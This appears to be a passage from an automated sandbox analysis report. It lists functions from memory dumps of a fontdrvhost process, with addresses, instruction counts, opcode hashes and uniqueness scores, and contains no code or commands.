                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b50c0183013e074cc824a9616c889246859060d3e29832612d015a90ab8258f
                                                                    • Instruction ID: d28860018e6134d30df3f6f6817a1bf9bdc81b8e9c8baa18c8613180946f734f
                                                                    • Opcode Fuzzy Hash: 8b50c0183013e074cc824a9616c889246859060d3e29832612d015a90ab8258f
                                                                    • Instruction Fuzzy Hash: F6418071F08A1B9FDB64DA9884A55BCB7B1FF99390F00427AE00DD7281EF24AC429780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4EA0 Relevance: .1, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e09cd5667130d40073096984347f0431665a0ca67b26ca41f7001a282a890808
                                                                    • Instruction ID: 8531a3950a543dab9e0d57ebe0c9625f04ab463ef4106724e10a044322c1165e
                                                                    • Opcode Fuzzy Hash: e09cd5667130d40073096984347f0431665a0ca67b26ca41f7001a282a890808
                                                                    • Instruction Fuzzy Hash: 7941BE61A0F6CA5FE76696B858641B87F94FF43264B0B01FFD08D8A0E3D94C1B56C361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCB70D Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33f8d35ceb6045b024a1f91d7dbb11d7a2660e6833ce7e1eba1050dd0135b102
                                                                    • Instruction ID: b54973f0b7997422f520e28c4bf79297f2bafa35d12652239bf3ae1c539815db
                                                                    • Opcode Fuzzy Hash: 33f8d35ceb6045b024a1f91d7dbb11d7a2660e6833ce7e1eba1050dd0135b102
                                                                    • Instruction Fuzzy Hash: F0418271B0990E8FEB69EB9C84755BCB3A1FF55314F25827AD05DC32D2DE24A902C781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E11A0 Relevance: .1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 545fbe5c94b2df8b28276e8c7b0bcc4cbdfe67bf5877db36f85627ba413ff1b3
                                                                    • Instruction ID: 61facf860146f1afac71104abbee0833286a78ccf1c811c128d32b54c4494b4b
                                                                    • Opcode Fuzzy Hash: 545fbe5c94b2df8b28276e8c7b0bcc4cbdfe67bf5877db36f85627ba413ff1b3
                                                                    • Instruction Fuzzy Hash: 78411820A0C55B4FEB78D65888B06F877B2FF95380F1441BEC15ED7187CE38A981A741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC7A57 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 68afaef5b6953533e4f1525c99668f09dd480dab2f893442c55b4c301e57a575
                                                                    • Instruction ID: b70f4db45e9bd3a7185824dfb47c28589c9010e1423c662888001bd2971c5c69
                                                                    • Opcode Fuzzy Hash: 68afaef5b6953533e4f1525c99668f09dd480dab2f893442c55b4c301e57a575
                                                                    • Instruction Fuzzy Hash: A841623270C9488FDF98EF58C4A6DA5B3E1FBA5311B0542AAD44AC3292DE31F845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DCC67 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 961ed429700299cb2629a4bcd960c7d6fe093f1053d90534c89b63e1a8b26371
                                                                    • Instruction ID: 2781d08987d2eeb3e8269e88187e4408921325912781a9cf583f0c4f30a6cc01
                                                                    • Opcode Fuzzy Hash: 961ed429700299cb2629a4bcd960c7d6fe093f1053d90534c89b63e1a8b26371
                                                                    • Instruction Fuzzy Hash: C9415F3170CA598FDF98EF58D4A5DA4B7F1FBA8311B04426AD45EC3192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC7B01 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c4f9e42fc082b3aba98ac7d027983bca76e93defea40369b41d30f18648aa65
                                                                    • Instruction ID: 61f4ed008fb49692a7ed1154cf2ba7257c1c66cd08c7a18344037d60746a404e
                                                                    • Opcode Fuzzy Hash: 1c4f9e42fc082b3aba98ac7d027983bca76e93defea40369b41d30f18648aa65
                                                                    • Instruction Fuzzy Hash: 933180316089488FDF98EF18C4A5DA4B3E1FFA9311B0542A9D44AC72A2DE31F845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DCD11 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01fcb229ef807c9e24ab714f946fb9af4d822728dde3cade96b6334c3d657bca
                                                                    • Instruction ID: 0888e790b25c6724d61982e5e7dc777bf43d372820ea67018148d102fa920061
                                                                    • Opcode Fuzzy Hash: 01fcb229ef807c9e24ab714f946fb9af4d822728dde3cade96b6334c3d657bca
                                                                    • Instruction Fuzzy Hash: BA317F3160CA598FDF98EF18C4A9DA477F1FBA8311B0542AAD45EC7192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC6780 Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d06b8c29d067c4a13b76cf71a47cc2f033d64cabbfaad89aeebacf3784688a8a
                                                                    • Instruction ID: 7f032cde75b66b19861fbca1963eaa0ff59c650b609999224a8b4f7990715317
                                                                    • Opcode Fuzzy Hash: d06b8c29d067c4a13b76cf71a47cc2f033d64cabbfaad89aeebacf3784688a8a
                                                                    • Instruction Fuzzy Hash: 52315820A1D85E4AEB78E65C8470AF473A1FF60304F1546BBC44FC71D6DD2CAA85C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC7A9B Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c8d01110aee7568b5f5890892a04d55335d1103fdf8486786dff75f1091520d3
                                                                    • Instruction ID: 07ff8427713b6f4525be6f6aef295937799c9353db8fb423b5aeead293bb1f0c
                                                                    • Opcode Fuzzy Hash: c8d01110aee7568b5f5890892a04d55335d1103fdf8486786dff75f1091520d3
                                                                    • Instruction Fuzzy Hash: F23192317089498FDF98EF18C4A5DA4B3E1FFA8311B0542A9D40AC72A2DE35F845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DCCAB Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 854f65be2642ea73198727b78afb52202e139beeac3ff21239d2ef80abb0980c
                                                                    • Instruction ID: b1d21c6fd78104955d5226f5d3400dfc5d028b5aa6f50ab7b91c4e65efe49215
                                                                    • Opcode Fuzzy Hash: 854f65be2642ea73198727b78afb52202e139beeac3ff21239d2ef80abb0980c
                                                                    • Instruction Fuzzy Hash: E0318F3170CA498FDFA8EF58C4A9DA4B7F1FB68311B0442AAD45EC7192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC2FD3 Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc91ef89f6298b63b3473d0a6a255c397b4a5eaadcbddcea9ff0e7963ce66785
                                                                    • Instruction ID: c1f34b6ac23ea3f99667dc8835e53ec1a9a76c342585c5a628ba1084c0dd8ff4
                                                                    • Opcode Fuzzy Hash: bc91ef89f6298b63b3473d0a6a255c397b4a5eaadcbddcea9ff0e7963ce66785
                                                                    • Instruction Fuzzy Hash: 8831AE32A0E68E8FDB95EBA8D8619FC7BB0FF55304F4601B6D049D71E3CA25A945C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC9AFA Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6bc5287f743b5f4ce2ee92acb308ba82593c1583487663f2e37e13c474d684a1
                                                                    • Instruction ID: 89440e72cda120844aa214e8cfe007aef7d11bc1c55f2a53d8ac452508a0376f
                                                                    • Opcode Fuzzy Hash: 6bc5287f743b5f4ce2ee92acb308ba82593c1583487663f2e37e13c474d684a1
                                                                    • Instruction Fuzzy Hash: AB31C671E0EA8D9FEB66DB98C8645BC7BB1FF46304F0501BAD08DD72E2DA24A905C711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D804A Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction ID: b2bdedd852cdc7de9227cea8618b8a76f80c73495762620138bd37661289af39
                                                                    • Opcode Fuzzy Hash: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction Fuzzy Hash: A231072094E3C64FE753937498696E53F716F43364F1802EAE089CA4E3EB990409D752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4BCD Relevance: .1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2395f90dff6c8738424643affce4bafa8dacfdc1de6265cb970a3c39c498e8f3
                                                                    • Instruction ID: 6f21d39507bfd25646123ae76dd9eb08f7eafee4fb02dbfada7db98cd49ccfc1
                                                                    • Opcode Fuzzy Hash: 2395f90dff6c8738424643affce4bafa8dacfdc1de6265cb970a3c39c498e8f3
                                                                    • Instruction Fuzzy Hash: 67312D71B0990E9FDB68EB9CD4619B8B3A1FF98314B115239D01EC3696DF24BD12CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9E6B Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e583476c18b4eb61fda2487d11de644b02067cf5584a8b3635f578a533d76d77
                                                                    • Instruction ID: bc0b64f022efee80efaa697feb0fd1e692f07291fa4dfe48f1108f231ef0e0a7
                                                                    • Opcode Fuzzy Hash: e583476c18b4eb61fda2487d11de644b02067cf5584a8b3635f578a533d76d77
                                                                    • Instruction Fuzzy Hash: 3F310371F1891B9FDB64EB98D4A19ACB3B1FF58351B10427AE01ED3681DF247C129B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C110AA7 Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2aa247de54839127dd083d8eaf05a3c4d90f2af6da3f8a2f84ccd6b6305ac8d
                                                                    • Instruction ID: 77e331a2daba373bf82137d891a47351df6526ac7c204139f39068c6fe8714cd
                                                                    • Opcode Fuzzy Hash: b2aa247de54839127dd083d8eaf05a3c4d90f2af6da3f8a2f84ccd6b6305ac8d
                                                                    • Instruction Fuzzy Hash: 6D31B771A0882D8FDFA4DF18C898FA877B1FB69305F1001DA900EE7261DA35AE81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCE355 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5e849796166f180b90d3380ee75f179ac513dd747df6b26e72e39eb12ae6bd0
                                                                    • Instruction ID: 1d9cced6685459f8fc41ec11cc636d3e59010ecdd67d483a78bf94dc9c2843e5
                                                                    • Opcode Fuzzy Hash: e5e849796166f180b90d3380ee75f179ac513dd747df6b26e72e39eb12ae6bd0
                                                                    • Instruction Fuzzy Hash: 04313930A1A94ECFEB79EB9884655BD76A1FF84304F5201BAD40EC22E1DA38BA40C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC7865 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e7364e946eb7eea46d5ffb45bb4b442e425ba0bd722cb01b7d0724e85946e3b
                                                                    • Instruction ID: fa747ca7cf611f45b55006f53fd0e7a3e83abe8bf5d257789ebacdb8aeb73d48
                                                                    • Opcode Fuzzy Hash: 4e7364e946eb7eea46d5ffb45bb4b442e425ba0bd722cb01b7d0724e85946e3b
                                                                    • Instruction Fuzzy Hash: 63316A32E1A94E9FEBA9EF8A84655BD77B1FF54304F52017AD10EC22E1CA786A00D741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9879 Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e687aefe064dc1f2140455c3d37cb40289cfe4db2e3b99e4abf214ff7c9378b5
                                                                    • Instruction ID: 1d91d3d2877db09d430995ef7c5715da6b92666cd1ce64c3c69ab14627803d31
                                                                    • Opcode Fuzzy Hash: e687aefe064dc1f2140455c3d37cb40289cfe4db2e3b99e4abf214ff7c9378b5
                                                                    • Instruction Fuzzy Hash: 6D31CC70E1861E9FDFA8DB58C4A5AADB7B1EF58311F0041BAD01EE3291DF34A9819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE54C Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6989cec008a79f7d2ad8e7a6f4d23abe501b70d67dd67fa566e975ae9560cd01
                                                                    • Instruction ID: fa6270320183b4b86babebbe45e526edb1d2a38b7ad7560e2b032b4c0bf6e9d5
                                                                    • Opcode Fuzzy Hash: 6989cec008a79f7d2ad8e7a6f4d23abe501b70d67dd67fa566e975ae9560cd01
                                                                    • Instruction Fuzzy Hash: CB31FD30E186199FDFA8DB58C4A5BA97BB1FB58381F1101BEE05EE3291DB34A9409B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9F25 Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 729ddfebae739d3372d311756fca4a9d721c168bdc941befb583fce7ab58323a
                                                                    • Instruction ID: 2b1c83b494944a33fd1422d2810cbadd50ab653627bdcaeed2e173e2de72dea1
                                                                    • Opcode Fuzzy Hash: 729ddfebae739d3372d311756fca4a9d721c168bdc941befb583fce7ab58323a
                                                                    • Instruction Fuzzy Hash: 0A31B471F186574FDB64AB9888726ECB7B1FF54350F140279E01DC72C2EE28A8055381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D8E37 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43907fb1394e8e7b46a908c4c9e82cd24440a47e1cd8a9985bf1e4fe9f8f91c4
                                                                    • Instruction ID: e483533d35263c007386bf54a80eadc44a295805840d5c06eb4c6f653ecf575e
                                                                    • Opcode Fuzzy Hash: 43907fb1394e8e7b46a908c4c9e82cd24440a47e1cd8a9985bf1e4fe9f8f91c4
                                                                    • Instruction Fuzzy Hash: 06312171F1891B8FEB64EB88C4A26FD77B1FF58340F500775E00ED6195EB286841AB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DCAE5 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c4e38945b12a76085df12daa1e5970e5209f41ff19d0a930cfa8e34c0733f43
                                                                    • Instruction ID: 8d3c447ca59874c5b2f637fe5e3c877193bd908c14c90f3d95fcabf5fbb5caf5
                                                                    • Opcode Fuzzy Hash: 6c4e38945b12a76085df12daa1e5970e5209f41ff19d0a930cfa8e34c0733f43
                                                                    • Instruction Fuzzy Hash: FB31C630B1C74BCEEBB8DB9884655BD7BB1FF54350F50027AE40ED6281EB39A944AB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCD243 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 824d50519f964d89c4775b908d0f984b738c124b025c1ff769856973acb1c8ba
                                                                    • Instruction ID: 6890e3c88c39ead50cf2627d4eab9a7ddc10831fd7469278d80a9c9319f30370
                                                                    • Opcode Fuzzy Hash: 824d50519f964d89c4775b908d0f984b738c124b025c1ff769856973acb1c8ba
                                                                    • Instruction Fuzzy Hash: 59315914A1E59A4AE73AD76C84B45747B51FFD2306B1A46FAC086CF4E7D82CF982C381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC6750 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a0ff8458878d16826618b13eb7d713045a779d346db98e40ee5b337f1fe7542
                                                                    • Instruction ID: 1672d68e96c82ec3b82b3cc68d71a75f9489866b95e151b72d46d93bfcb764c4
                                                                    • Opcode Fuzzy Hash: 5a0ff8458878d16826618b13eb7d713045a779d346db98e40ee5b337f1fe7542
                                                                    • Instruction Fuzzy Hash: F7212910A1D59A4AE739E35C8474DF47B91FF61305B2A46B7D49BCB0EBC82CA582C341
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E1170 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92deae713fb67a332091adc3425c593c36fd7a9a0ee7eaaf12e6b64135555c18
                                                                    • Instruction ID: 10d0a696b65a29509d105334a0712abd5807961ee9cee5b0e3fe7857067e79ea
                                                                    • Opcode Fuzzy Hash: 92deae713fb67a332091adc3425c593c36fd7a9a0ee7eaaf12e6b64135555c18
                                                                    • Instruction Fuzzy Hash: D4310B10A5C5D74AE73A835448B45B47B72EF92391F1846FEC09ECB4D7D62CE491E341
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DB9D2 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e155bf6a8e549a23abace64027ccb93094208e1afd0957aecb9fb98a73c2b6de
                                                                    • Instruction ID: cec932840b5ad7e90ca21e90f215bab41e47cf7f1c4906446136a8c367faaaa2
                                                                    • Opcode Fuzzy Hash: e155bf6a8e549a23abace64027ccb93094208e1afd0957aecb9fb98a73c2b6de
                                                                    • Instruction Fuzzy Hash: 64310910A1C6974AE73A875C44709B47B72EF52351F1847FAE0AE8F1D7EA2CA841E381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

